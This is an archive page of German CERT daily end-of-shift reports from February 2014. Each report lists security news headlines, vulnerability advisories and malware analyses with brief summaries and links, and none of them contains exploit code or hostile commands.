--------------------------------------------- Die rote oder die blaue Pille? Immer mehr Schädlinge wollen wissen, ob ihre Umgebung echt oder nur virtuell ist. --------------------------------------------- http://www.heise.de/security/artikel/VM-Erkennung-in-Malware-2131459.html *** The Mobile Cybercriminal Underground Market in China *** --------------------------------------------- The availability of affordable mobile Internet access has changed the computing landscape everywhere. More and more people are using mobile devices both for work and for entertainment. China is no exception. According to a report published by the China Internet Network Information Center (CNNIC), 81% of Chinese Internet users went online using their mobile phone .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/the-mobile-cyber…

1 0

Tageszusammenfassung - Freitag 28-02-2014
by Daily end-of-shift report 28 Feb '14

28 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 27-02-2014 18:00 − Freitag 28-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Are Automated Update Services the Next Surveillance Frontier? *** --------------------------------------------- Automated update services that provide users with security patches and feature enhancements are also a potential hunting ground for intelligence agencies and law enforcement surveillance activity. --------------------------------------------- http://threatpost.com/are-automated-update-services-the-next-surveillance-f… *** DDoS and BCP 38, (Thu, Feb 27th) *** --------------------------------------------- Quite often on many lists we will hear the term Best Current Practice (BCP) 38 bandied about and further recommendations to implement [1] [2][3][4] (See NANOG Mailing list archive) . Some will say "it will aid in DDoS mitigation" and even others will even state "All Internet Service Providers (ISP) should implement this." Now before the philosophical discussions ensue in the comments, it might be a good idea to discuss, technically, what it is? And perhaps what it can do? --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17735&rss *** Oversharing, (Fri, Feb 28th) *** --------------------------------------------- When ISC reader Michael contacted us about "odd UDP traffic from all over" that he was suddenly seeing in his firewall log, we at first assumed that his Internet connection had "inherited" a dynamic IP address that had before been used by a rampant file sharing user, and that Michael was now seeing the "after glow". We still asked for a PCAP (tcpdump) file though, and when we looked at what Michael sent back, we saw to our surprise... --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17737&rss *** Highly Effective Joomla Backdoor with Small Profile *** --------------------------------------------- It feels like every day we're finding gems, or what appear to be gems to us. We try to balance the use of the term, but I can't lie, these are truly gems. The things they are doing, and by they I mean the attackers, are in some instance ingenious. I think you'll agree that... --------------------------------------------- http://blog.sucuri.net/2014/02/highly-effective-joomla-backdoor-with-small-… *** Tilon/SpyEye2 intelligence report *** --------------------------------------------- Tilon, son of Silon, or... SpyEye2 evolution of SpyEye? The malware family commonly known as Tilon has been around for several years now. While several public analysis reports have described the malware; no one has thus far linked it with the well-known SpyEye malware family. In light of the recent news of the guilty plea... --------------------------------------------- http://blog.fox-it.com/2014/02/25/tilonspyeye2-intelligence-report/ *** Malicious Proxy Auto-Config redirection *** --------------------------------------------- Internet banking credentials are a desired target for cybercriminals. They can be targeted with man-in-the-middle attacks or through password stealing trojans such as Fareit, Zbot or Banker. A less known, yet commonly found in South America and to a lesser extent in Russia, method to gain unauthorized access to a user's banking credentials is through malicious Proxy Auto-Config (PAC) files. Normally, PAC files offer similar functionality to the hosts file, allowing IP/website redirection,... --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2014/02/28/malicious-proxy-auto-con… *** Notorious "Gameover" malware gets itself a kernel-mode rootkit... *** --------------------------------------------- Zeus, also known as Zbot, is a malware family that we have written about many times on Naked Security... --------------------------------------------- http://nakedsecurity.sophos.com/2014/02/27/notorious-gameover-malware-gets-… *** [2014-02-28] Authentication bypass (SSRF) and local file disclosure in Plex Media Server *** --------------------------------------------- The Plex Media Server proxy functionality fails to properly validate pre-authentication user requests. This allows unauthenticated attackers to make the Plex Media Server execute arbitrary HTTP requests and hence bypass all authentication and execute commands with administrative privileges. Furthermore, because of insufficient input validation, arbitrary local files can be disclosed without prior authentication including passwords and other sensitive information. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** [2014-02-28] Privilege escalation vulnerability in MICROSENS Profi Line Modular Industrial Switch Web Manager *** --------------------------------------------- Attackers are able to elevate privileges during login from read-only user rights to full read/write or debug access rights by simply changing result values of the affected CGI script. This allows attackers to reconfigure the device. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** VU#534284: Synology DiskStation Manager VPN module hard-coded password vulnerability *** --------------------------------------------- Synology DiskStation Manager 4.3-3810 update 1 and possibly earlier versions contain a VPN server module which contains a hard-coded password which cannot be changed. According to the original forum post... --------------------------------------------- http://www.kb.cert.org/vuls/id/534284 *** Moodle 2.6.1 Cross Site Scripting *** --------------------------------------------- Topic: Moodle 2.6.1 Cross Site Scripting Risk: Low Text:# == # Title ...| Moodle 2.6.1 # Version .| (Feb 27 2014) moodle-latest-26.zip # Date ....| 27.02.2014... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020247 *** Cisco IPS MainApp SNMP Denial of Service Vulnerability *** --------------------------------------------- A vulnerability in the SNMP code of Cisco Intrusion Prevention System (IPS) Software could allow an unauthenticated, remote attacker to cause the MainApp process to become unresponsive. This creates a denial of service (DoS) condition because the Cisco IPS sensor is not able to execute several critical tasks including alert notification, event store management, and sensor authentication. The Cisco IPS web server will also be unavailable while the MainApp process is unresponsive. Additionally, due to this general system failure, other processes such as the Analysis Engine may not function properly. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Cisco Unified Communications Domain Manager Cross-Site Scripting Vulnerability *** --------------------------------------------- A vulnerability in the web framework of Cisco Unified Communications Domain Manager could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web interface on the affected system. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Schneider Electric Floating License Manager Vulnerability *** --------------------------------------------- Schneider Electric had become aware of an "unquoted service path" vulnerability in the Schneider Electric Floating License Manager, produced a patch that mitigates this vulnerability, and notified NCCIC/ICS-CERT. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-058-01 *** Schneider Electric OFS Buffer Overflow Vulnerability *** --------------------------------------------- Schneider Electric has reported to NCCIC/ICS-CERT a Stack Buffer Overflow vulnerability supplied with the Schneider Electric OPC Factory Server (OSF). --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-058-02

1 0

Tageszusammenfassung - Donnerstag 27-02-2014
by Daily end-of-shift report 27 Feb '14

27 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 26-02-2014 18:00 − Donnerstag 27-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Avaya to Patch Zero Days That Turn IP Phone into Radio Transmitters *** --------------------------------------------- Avaya is expected to patch zero-day vulnerabilities in its latest one-X IP phones. The vulnerabilities and an exploit will be demonstrated this week at RSA Conference 2014. --------------------------------------------- http://threatpost.com/avaya-to-patch-zero-days-that-turn-ip-phone-in-radio-… *** Detecting malware on Mac OS X with USM and MIDAS *** --------------------------------------------- Let's briefly review what we accomplished in the first post: Understood the capabilities and design of MIDAS Deployed MIDAS on a Mac OS X endpoint installed the MIDAS plugin in AlienVault USM Verified the integration by running MIDAS and confirming the events in the SIEM. How does this make us safer? More generally, what does this mean? To answer these questions we need to understand what plists and kexts mean from a security perspective. PlistsProperty list files contain configuration data... --------------------------------------------- http://www.alienvault.com/open-threat-exchange/blog/detecting-malware-on-ma… *** Ongoing NTP Amplification Attacks, (Wed, Feb 26th) *** --------------------------------------------- Brett, who alerted us earlier this month regarding the mass exploit against Linksys devices has surfaced a current issue hes facing with ongoing NTP amplification attacks. A good US-CERT summary of the attack is here: https://www.us-cert.gov/ncas/alerts/TA14-013A. Brett indicates that: "We are seeing massive attacks on our NTP servers, attempting to exploit the traffic amplification vulnerability reported last month. Our IPs are being probed by an address in the Netherlands, and a couple... --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17723&rss *** Yes, You Too Can Be An Evil Network Overlord - On The Cheap With OpenBSD, pflow And nfsen *** --------------------------------------------- Have you ever wanted to know whats really going on in your network? Some free tools with surprising origins can help you to an almost frightening degree.One question I get a lot (or variants that end up being very close) is, "How do you keep up with whats happening in your network?". A close cousin is "how much do you actually know about your users?".The exact answer to both can have legal implications, so before I proceed to the tech content, Ill ask you to make sure you... --------------------------------------------- http://bsdly.blogspot.com/2014/02/yes-you-too-can-be-evil-network.html *** Weekly Metasploit Update: Encoding-Fu, New Powershell Payload, Bug Fixes *** --------------------------------------------- In this week's Metasploit weekly update, we begin with OJ TheColonial Reeves' new optimized sub encoding module (opt_sub.rb). As the name implies, this encoder takes advantage of the SUB assembly instruction to encode a payload with printable characters that are file path friendly. Encoders like this are incredibly useful for developing a memory corruption exploit... --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/02/26/weekly-me… *** Security: Cisco öffnet Snort-Schnittstelle *** --------------------------------------------- Wenige Wochen nach der Übernahme des Snort-Entwicklers Sourcefire hat Cisco die Schnittstelle zu dem Intrusion Detection System unter dem Namen OpenAppID öffentlich gemacht. Zudem wurde der Malware-Schutz des aufgekauften Unternehmens in Ciscos Sicherheitsportfolio integriert. --------------------------------------------- http://www.golem.de/news/security-cisco-oeffnet-snort-schnittstelle-1402-10… *** Mac OS X 10.6 Snow Leopard: Apple aktualisiert nicht mehr *** --------------------------------------------- Die letzten zwei größeren Sicherheitsupdates von Apple standen nur noch für Mavericks, Mountain Lion und Lion bereit. Dabei ist OS X 10.6 noch relativ weit verbreitet. --------------------------------------------- http://www.heise.de/security/meldung/Mac-OS-X-10-6-Snow-Leopard-Apple-aktua… *** Was the iOS SSL Flaw Deliberate? *** --------------------------------------------- Last October, I speculated on the best ways to go about designing and implementing a software backdoor. I suggested three characteristics of a good backdoor: low chance of discovery, high deniability if discovered, and minimal conspiracy to implement. The critical iOS vulnerability that Apple patched last week is an excellent example. Look at the code. What caused the vulnerability is... --------------------------------------------- https://www.schneier.com/blog/archives/2014/02/was_the_ios_ssl.html *** Android & iOS: Gratis-Werkzeuge zur Malware-Analyse *** --------------------------------------------- Die Linux-Distribution Santoku bringt alle Werkzeuge mit, um Malware und andere Apps für iOS und Android professionell unter die Lupe zu nehmen. Eine Kombination aus einer App und einem Webdienst analysiert unter anderem Datenströme von Apps. --------------------------------------------- http://www.heise.de/security/meldung/Android-iOS-Gratis-Werkzeuge-zur-Malwa… *** Atlassian - Security Bypass Vulnerabilities in various Products *** --------------------------------------------- Security Bypass Vulnerabilities in Atlassian Bamboo, Confluence, FishEye, JIRA, Crucible and Stash --------------------------------------------- https://secunia.com/advisories/57086 https://secunia.com/advisories/57088 https://secunia.com/advisories/57095 https://secunia.com/advisories/57105 https://secunia.com/advisories/56842 https://secunia.com/advisories/56936 *** [2014-02-27] Local Buffer Overflow vulnerability in SAS for Windows *** --------------------------------------------- Attackers are able to completely compromise SAS clients when a malicious SAS program gets executed as the software "SAS for Windows" is affected by a local buffer overflow vulnerability. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** Drupal - Vulnerabilities in third-party Modules and Themes *** --------------------------------------------- Vulnerabilities in Open Omega (third-party theme), Content locking (anti-concurrent editing) (third-party module), Project Issue File Review (third-party module) and Mime Mail (third-party module) --------------------------------------------- https://drupal.org/node/2205877 https://drupal.org/node/2205807 https://drupal.org/node/2205767 https://drupal.org/node/2205991 *** Schneider Electric CitectSCADA Products Exception Handler Vulnerability (Update A) *** --------------------------------------------- This updated advisory is a follow-up to the original advisory titled ICSA-13-350-01 Schneider Electric SCADA Products Exception Handler Vulnerability that was published February 25, 2014, on the NCCIC/ICS-CERT web site. This advisory was originally posted to the US-CERT secure Portal library on December 16, 2013. Schneider Electric requested the title change to reduce confusion. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-13-350-01A

1 0

Tageszusammenfassung - Mittwoch 26-02-2014
by Daily end-of-shift report 26 Feb '14

26 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 25-02-2014 18:00 − Mittwoch 26-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Chameleon: Forschungsvirus verbreitet sich von WLAN zu WLAN *** --------------------------------------------- Britische Wissenschaftler haben unter dem Namen "Chameleon" einen vollständigen Router-Wurm geschaffen, der das Internet nicht braucht. Die Malware kopiert sich von einem Router zum anderen per WLAN und kann sich so epidemieartig ausbreiten. Aber auch Wege zur Abwehr solcher Gefahren sind absehbar. (WLAN, Virus) --------------------------------------------- http://www.golem.de/news/chameleon-forschungs-virus-verbreitet-sich-von-wla… *** DDoSing a Cell Phone Network *** --------------------------------------------- Interesting research: Abstract: The HLR/AuC is considered to be one of the most important network elements of a 3G network. It can serve up to five million subscribers and at least one transaction with HLR/AuC is required for every single phone call or data session. This paper presents experimental results and observations that can be exploited to perform a novel... --------------------------------------------- https://www.schneier.com/blog/archives/2014/02/ddosing_a_cell.html *** IE Zero-day Exploit Being Used in Widespread Attacks *** --------------------------------------------- The number of attacks exploiting a yet-to-be-patched vulnerability in Internet Explorer has increased dramatically over the past few days, indicating the exploit is no longer used just in targeted attacks against particular groups of people. --------------------------------------------- http://www.cio.com/article/748778/IE_Zero_day_Exploit_Being_Used_in_Widespr… *** QuickTime 7.7.5 für Windows behebt diverse Sicherheitslücken *** --------------------------------------------- Apples Multimediaumgebung enthält unter Windows eine ganze Reihe von sicherheitsrelevanten Bugs. Version 7.7.5 soll sie beheben - ein schnelles Update ist angeraten. --------------------------------------------- http://www.heise.de/security/meldung/QuickTime-7-7-5-fuer-Windows-behebt-di… *** Announcing EMET 5.0 Technical Preview *** --------------------------------------------- Today, we are thrilled to announce a preview release of the next version of the Enhanced Mitigation Experience Toolkit, better known as EMET. You can download EMET 5.0 Technical Preview here. This Technical Preview introduces new features and enhancements that we expect to be key components of the final EMET 5.0 release. We are releasing this technical preview to gather customer feedback about the new features and enhancements. Your feedback will affect the final EMET 5.0 technical --------------------------------------------- https://blogs.technet.com/b/srd/archive/2014/02/25/announcing-emet-5-0-tech… *** VU#684412: libpng denial-of-service vulnerability *** --------------------------------------------- Vulnerability Note VU#684412 libpng denial-of-service vulnerability Original Release date: 25 Feb 2014 | Last revised: 25 Feb 2014 Overview libpng versions 1.6.0 through 1.6.9 contain a denial-of-service vulnerability. Description CWE-835: Loop with Unreachable Exit Condition (Infinite Loop) - CVE-2014-0333Glenn Randers Pehrson of the PNG Development Group reports:The progressive decoder in libpng16 enters an infinite loop, thus hanging the application, when it encounters a zero-length IDAT... --------------------------------------------- http://www.kb.cert.org/vuls/id/684412 *** Schneider Electric SCADA Products Exception Handler Vulnerability *** --------------------------------------------- Researcher Carsten Eiram of Risk Based Security has identified an exception handling vulnerability in Schneider Electric’s CitectSCADA application. The original vulnerability reported by Mr. Eiram had already been fixed in CitectSCADA v7.20SP2. While investigating this vulnerability report, Schneider Electric discovered additional related vulnerabilities and has produced a patch that mitigates them in SCADA Expert Vijeo Citect, CitectSCADA, and PowerSCADA Expert. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-13-350-01 *** IBM AIX OpenSSL Multiple Denial of Service Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/57041 *** Python Buffer Overflow in socket.recvfrom_into() Lets Remote Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1029831 *** Cisco Unified Communications Manager CAPF Unauthenticated Device Information Update Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Cisco Unified Communications Manager OS Administration CSRF Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Cisco Unified Contact Center Express CCMConfig Sensitive Information Disclosure Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Cisco Unified Contact Center Express Serviceability Page CSRF Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…

1 0

Tageszusammenfassung - Dienstag 25-02-2014
by Daily end-of-shift report 25 Feb '14

25 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 24-02-2014 18:00 − Dienstag 25-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Android users under attack through malicious ads in Facebook *** --------------------------------------------- Cyber-criminals are always trying to attract people's attention in order to carry out their crimes. So it should be no surprise that they have now found a combined way of using Facebook (the world's largest social network), WhatsApp (the leading text messaging program for smartphones, recently bought by Facebook) and Android (the most popular operating... --------------------------------------------- http://pandalabs.pandasecurity.com/android-users-under-attack-through-malic… *** New attack completely bypasses Microsoft zero-day protection app *** --------------------------------------------- Whitehats ability to sidestep EMET strongly suggest criminal hackers can, too. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/aCb9-4Ke6D8/ *** Poisoned YouTube ads serve Caphaw banking trojan *** --------------------------------------------- YouTubes ad network was compromised to host the Styx exploit kit, researchers found. --------------------------------------------- http://www.scmagazine.com/poisoned-youtube-ads-serve-caphaw-banking-trojan/… *** Blog: The first Tor Trojan for Android *** --------------------------------------------- Virus writers of Android Trojans have traditionally used Windows malware functionality as a template. Now, yet another technique from Windows Trojans has been implemented in malware for Android: for the first time we have detected an Android Trojan that uses a domain in the .onion pseudo zone as a C&C. The Trojan uses the anonymous Tor network built on a network of proxy servers. As well as providing users with anonymity,... --------------------------------------------- http://www.securelist.com/en/blog/8184/The_first_Tor_Trojan_for_Android *** Touchlogger: iOS im Lauscheinsatz *** --------------------------------------------- Die Sicherheitsexperten von Fireeye Labs haben eine iOS-App entwickelt, mit der sich alle Eingaben auf der Touchscreen-Oberfläche im Hintergrund mitschneiden und an einen Server übermitteln lassen. --------------------------------------------- http://www.golem.de/news/touchlogger-ios-im-lauscheinsatz-1402-104776-rss.h… *** The Tenth Anniversary of Mobile Malware *** --------------------------------------------- 2014 marks the tenth anniversary of mobile malware. It all began in 2004, when the first variant of SymbOS.Cabir was submitted to security researchers. The analysis revealed that this worm targeted Symbian OS, which was a very popular mobile operating system at the time. Infected phones would search for nearby Bluetooth devices that... --------------------------------------------- http://www.symantec.com/connect/blogs/tenth-anniversary-mobile-malware *** Best Practices in Computer Network Defense *** --------------------------------------------- This article was published in the book in Computer Network Defense: Incident Detection and Response. Edited by Melissa E. Hathaway, NATO Science for Peace and Security Series, 2014. The article is about the Dutch approach, the importance of intertnational cooperation and the role of the Dutch Cyber Security Council. --------------------------------------------- http://www.ncsc.nl/english/current-topics/news/best-practices-in-computer-n… *** "goto fail": Demo-Exploit für SSL-Schwachstelle in iOS und OS X *** --------------------------------------------- Der Sicherheitsforscher Aldo Cortesi hat sein Tool mitmproxy angepasst, um den verschlüsselten Datenverkehr von ungepatchten iOS-Geräten und Macs mit OS X 10.9 Mavericks mitzuschneiden. Fast alles lasse sich mitlesen, so Cortesi. --------------------------------------------- http://www.heise.de/security/meldung/goto-fail-Demo-Exploit-fuer-SSL-Schwac… *** HPSBST02937 rev.1 - HP StoreVirtual 4000 and StoreVirtual VSA Software dbd_manager, Remote Execution of Arbitrary Code *** --------------------------------------------- A potential security vulnerability has been identified with HP StoreVirtual 4000 and StoreVirtual VSA Software (formerly known as HP LeftHand Virtual SAN Appliance) dbd_manager. The vulnerability could be remotely exploited resulting in execution of arbitrary code. --------------------------------------------- http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl… *** HPSBMU02971 rev.1 - HP Application Information Optimizer, Remote Execution of Code, Information Disclosure *** --------------------------------------------- A potential security vulnerability has been identified in the Web Console component of HP Application Information Optimizer (formerly HP Database Archiving). The vulnerability could be exploited to allow remote execution of code and information disclosure. --------------------------------------------- http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl… *** Bugtraq: WiFiles HD v1.3 iOS - File Include Web Vulnerability *** --------------------------------------------- http://www.securityfocus.com/archive/1/531236 *** MYBB 1.6.12 search.php Sql injection *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020202 *** GitHub RCE by Environment variable injection Bug Bounty *** --------------------------------------------- Topic: GitHub RCE by Environment variable injection Bug Bounty Risk: High Text:GitHub RCE by Environment variable injection Bug Bounty writeup Disclaimer: Ill keep this really short but I hope youll g... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020209 *** TYPO3 6.1.7 XSS / Disclosure / Shell Upload *** --------------------------------------------- Topic: TYPO3 6.1.7 XSS / Disclosure / Shell Upload Risk: High Text:# == # Title ...| Multiple vulnerabilities in Typo3 CMS # Version .| introductionpackage-6.1.7 # Date ..... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020208 *** FreePBX 2.x Remote Command Execution *** --------------------------------------------- Topic: FreePBX 2.x Remote Command Execution Risk: High Text:App : Freepbx 2.x Download : schmoozecom.net Auther : i-Hmx Mail : n0p1337(a)gmail.com Home : security arrays inc. , sec4ever... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020206 *** Zen Cart E-Commerce 1.5.1 Multiple vulnerabilities *** --------------------------------------------- Topic: Zen Cart E-Commerce 1.5.1 Multiple vulnerabilities Risk: High Text:# == # Title ...| Multiple vulnerabilities in Zen Cart e-commerce # Version .| zen-cart-v1.5.1-full-file... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020203 *** WordPress Search Everything Plugin SQL Injection Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56820 *** AutoCAD Insecure Library and FAS File Loading Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/57002 *** OATH Toolkit libpam-oath replay *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/91316

1 0

Tageszusammenfassung - Montag 24-02-2014
by Daily end-of-shift report 24 Feb '14

24 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 21-02-2014 18:00 − Montag 24-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Researchers Develop Complete Microsoft EMET Bypass *** --------------------------------------------- Researchers at Bromium Labs are expected to deliver a paper today that explains how they were able to bypass all of the memory protection mitigations in Microsofts Enhanced Mitigation Experience Toolkit --------------------------------------------- http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/10… *** Apples SSL/TLS bug (22 Feb 2014) *** --------------------------------------------- Yesterday, Apple pushed a rather spooky security update for iOS that suggested that something was horribly wrong with SSL/TLS in iOS but gave no details. Since the answer is at the top of the Hacker News thread, I guess the cats out of the bag already and were into the misinformation-quashing stage now. --------------------------------------------- https://www.imperialviolet.org/2014/02/22/applebug.html *** An In-depth Analysis of Linux/Ebury *** --------------------------------------------- ESET has been analyzing and tracking an OpenSSH backdoor and credential stealer named Linux/Ebury. The result of this work on the Linux/Ebury malware family is part of a joint research effort with CERT‑Bund, the Swedish National Infrastructure for Computing, the European Organization for Nuclear Research (CERN) and other organizations forming an international Working Group. --------------------------------------------- http://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/ *** Microsoft Windows Crash Reports Reveal New APT, POS Attacks *** --------------------------------------------- You never know what youll glean from a Windows crash report: security researchers recently unearthed a previously unknown advanced persistent threat campaign as well as a new point-of-sale system attack by perusing and analyzing those crash reports also known as Dr. Watson. --------------------------------------------- http://www.darkreading.com/attacks-breaches/microsoft-windows-crash-reports… *** NIST Unveils Crypto Standards Proposal *** --------------------------------------------- Because of concerns of possible National Security Agency meddling with its cryptographic standards, the National Institute of Standards and Technology has issued a draft report proposing revisions in how it develops cryptographic standards. --------------------------------------------- http://www.govinfosecurity.com/nist-unveils-crypto-standards-proposal-a-6519 *** Freier Zugriff auf Fernsteuerungen für Industrieanlagen *** --------------------------------------------- Ein Projekt der FU Berlin dokumentiert, dass weltweit tausende Industrieanlagen über das Internet erreichbar, aber nur unzureichend geschützt sind. Es entstand eine interaktive Karte, auf der potenziell angreifbare Anlagen eingezeichnet sind. --------------------------------------------- http://www.heise.de/security/meldung/Freier-Zugriff-auf-Fernsteuerungen-fue… *** Security vulnerabilities found in 80% of best-selling SOHO wireless routers *** --------------------------------------------- Tripwire has analyzed the security provided by the most popular wireless routers used in many small and home offices and found that 80 percent of Amazon's top 25 best-selling SOHO wireless router models have security vulnerabilities. --------------------------------------------- http://www.net-security.org/secworld.php?id=16399 *** eGroupWare Multiple PHP Object Injection Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/57047 *** JBoss RichFaces Malformed Push Request Denial of Service Vulnerability *** --------------------------------------------- https://secunia.com/advisories/57053 *** Barracuda Firewall Exception Handling Cross Site Scripting *** --------------------------------------------- Topic: Barracuda Firewall Exception Handling Cross Site Scripting Risk: Low Text:Document Title: Barracuda Bug Bounty #36 Firewall - Client Side Exception Handling Web Vulnerability References ... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020186 *** DSA-2866 gnutls26 *** --------------------------------------------- certificate verification flaw --------------------------------------------- http://www.debian.org/security/2014/dsa-2866 *** ICONICS GENESIS32 Insecure ActiveX Control *** --------------------------------------------- NCCIC/ICS-CERT discovered a vulnerability in the ICONICS GENESIS32 application during resolution of unrelated products. ICONICS has produced a patch for all vulnerable versions of its GENESIS32 product. ICONICS GENESIS32 Version 9.0 and newer are not vulnerable to this ActiveX vulnerability. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-14-051-01 *** HPSBMU02964 rev.1 - HP Service Manager, Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Remote Denial of Service (DoS), Execution of Arbitrary Code, Unauthorized Access, Disclosure of Information and Authentication Issues *** --------------------------------------------- Potential security vulnerabilities have been identified with HP Service Manager. The vulnerabilities could be remotely exploited resulting in Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Denial of Service (DoS), execution of arbitrary code, unauthorized access, disclosure of Information, and authentication issues. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** ASUS router drive-by code execution via XSS and authentication bypass *** --------------------------------------------- Several ASUS routers include reflected Cross-Site Scripting (CWE-79) and authentication bypass (CWE-592) vulnerabilities. An attacker who can lure a victim to browse to a web site containing a specially crafted JavaScript payload can execute arbitrary commands on the router as administrator (root). No user interaction is required. --------------------------------------------- https://sintonen.fi/advisories/asus-router-auth-bypass.txt

1 0

Tageszusammenfassung - Freitag 21-02-2014
by Daily end-of-shift report 21 Feb '14

21 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 20-02-2014 18:00 − Freitag 21-02-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** Adobe Flash: Zero-Day-Exploit wird aktiv ausgenutzt *** --------------------------------------------- Adobe hat diesen Monat erneut einen Sicherheitspatch für den Flash Player veröffentlicht. Dieser sollte schleunigst eingespielt werden. Derzeit laufen Attacken auf den Flash Player, bei dem ein Sicherheitsloch aktiv ausgenutzt wird. (Adobe, Server) --------------------------------------------- http://www.golem.de/news/adobe-flash-zero-day-exploit-wird-aktiv-ausgenutzt… http://blogs.adobe.com/psirt/?p=1059 http://helpx.adobe.com/security/products/flash-player/apsb14-07.html *** Sicherheitsupdate für freie Datenbank PostgreSQL *** --------------------------------------------- Die Entwickler schließen mehrere Sicherheitslücken, die Anwendern eine Veränderung ihrer Rechte erlaubten. Außerdem warnen sie vor einem noch nicht behobenen Fehler, der das Kapern eines System-Accounts ermöglicht. --------------------------------------------- http://www.heise.de/security/meldung/Sicherheitsupdate-fuer-freie-Datenbank… http://www.postgresql.org/about/news/1506/ *** Spamvertised "You received a new message from Skype voicemail service" themed emails lead to Angler exploit kit *** --------------------------------------------- We've just intercepted a currently circulating malicious spam campaign that's attempting to trick potential botnet victims into thinking that they've received a legitimate Voice Message Notification from Skype. In reality though, once socially engineered users click on the malicious link found in the bogus emails, they're automatically exposed to the client-side exploits served by the Angler exploit kit. --------------------------------------------- http://www.webroot.com/blog/2014/02/20/spamvertised-received-new-message-sk… *** Erpressungs-Trojaner Bitcrypt geknackt *** --------------------------------------------- Der Erpressungs-Trojaner Bitcrypt verschlüsselt Dateien des Anwenders und rückt die Daten nur gegen Zahlung von Lösegeld wieder raus. Sicherheitsexperten gelang es jedoch, die Verschlüsselung zu knacken. --------------------------------------------- http://www.heise.de/security/meldung/Erpressungs-Trojaner-Bitcrypt-geknackt… *** Google Fixes 28 Security Flaws in Chrome 33 *** --------------------------------------------- Google Chrome 33 is out, and the new version of the browser includes fixes for 28 security vulnerabilities, including a number of high-severity bugs. The company paid out more than $13,000 in rewards to researchers who reported vulnerabilities that were fixed in this release. --------------------------------------------- https://threatpost.com/google-fixes-28-security-flaws-in-chrome-33/104391 *** HP Service Manager Bugs Let Remote Users Execute Arbitrary Code and Deny Service and Conduct Cross-Site Scripting and Cross-Site Requset Forgery Attacks *** --------------------------------------------- CVE Reference: CVE-2013-6202 Date: Feb 21 2014 Impact: Denial of service via network, Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network --------------------------------------------- http://www.securitytracker.com/id/1029803 http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl… *** AdRotate 3.9.4 SQL Injection *** --------------------------------------------- Topic: AdRotate 3.9.4 SQL Injection Risk: Medium Text:Advisory ID: HTB23201 Product: AdRotate Vendor: AJdG Solutions Vulnerable Version(s): 3.9.4 and probably prior Tested Versi... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020178

1 0

Tageszusammenfassung - Donnerstag 20-02-2014
by Daily end-of-shift report 20 Feb '14

20 Feb '14

